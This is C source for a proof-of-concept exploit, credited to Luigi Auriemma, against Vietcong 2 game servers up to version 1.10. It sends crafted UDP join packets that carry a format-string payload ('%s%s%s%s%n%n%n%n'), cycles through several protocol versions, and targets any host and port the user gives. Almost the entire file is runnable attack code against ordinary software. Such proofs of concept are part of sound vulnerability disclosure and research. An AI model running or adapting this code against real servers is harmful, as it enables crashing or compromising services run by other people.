/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef unsigned char   u8;
typedef unsigned short  u16;
typedef unsigned int    u32;



#define VER         "0.1"
#define BUFFSZ      1500
#define PORT        5000
#define PADDING(X)  ((X + 7) & (~7))



int write_bstr(u8 *b, int bits, u8 *str);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u32     b;
    int     sd,
            len,
            id,
            ver     = 1100;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    fputs("\n"
        "Vietcong 2 <= 1.10 format string "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    memset(buff, 0, BUFFSZ);

redo:
    printf("\n- try version %d\n", ver);

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    b = 0;
    b = write_bits(0x00, 8,  buff, b);
    b = write_bits(0x10, 8,  buff, b);
    b = write_bits(0x00, 8,  buff, b);
    b = write_bits(0x2a, 8,  buff, b);
    b = write_bits(0x0a, 8,  buff, b);
    b = write_bits(time(NULL), 32, buff, b);
    b = write_bits(0x00, 8,  buff, b);
    b = write_bits(ver,  16, buff, b);
    b = write_bstr(buff, b, "%s%s%s%s%n%n%n%n");
    len = send_recv(sd, buff, 0x2f, buff, BUFFSZ, &peer, 1);

    if(buff[0] != 1) {
        close(sd);
        switch(ver) {
            case 1100: ver = 1000;  break;
            case 1000: ver = 74;    break;
            case 74:   ver = 72;    break;
            default: {
                printf("\nError: unknown version or password protection (not implemented)\n");
                exit(1);
            }
        }
        goto redo;
    }

    id = read_bits(16, buff, 8);

    b = 0;
    b = write_bits(0x00, 8,  buff, b);
    b = write_bits(0x00, 8,  buff, b);
    b = write_bits(0x02, 8,  buff, b);
    b = write_bits(id,   16, buff, b);
    len = send_recv(sd, buff, 5, buff, BUFFSZ, &peer, 0);

    close(sd);

    printf("\n- check the server manually for verifying if it's vulnerable or not\n");
    return(0);
}



int write_bstr(u8 *data, int b, u8 *str) {
    int     i;

    for(i = 0; ; i++) {
        b = write_bits(str[i], 7, data, b);
        if(!str[i]) break;
    }
    return(b);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

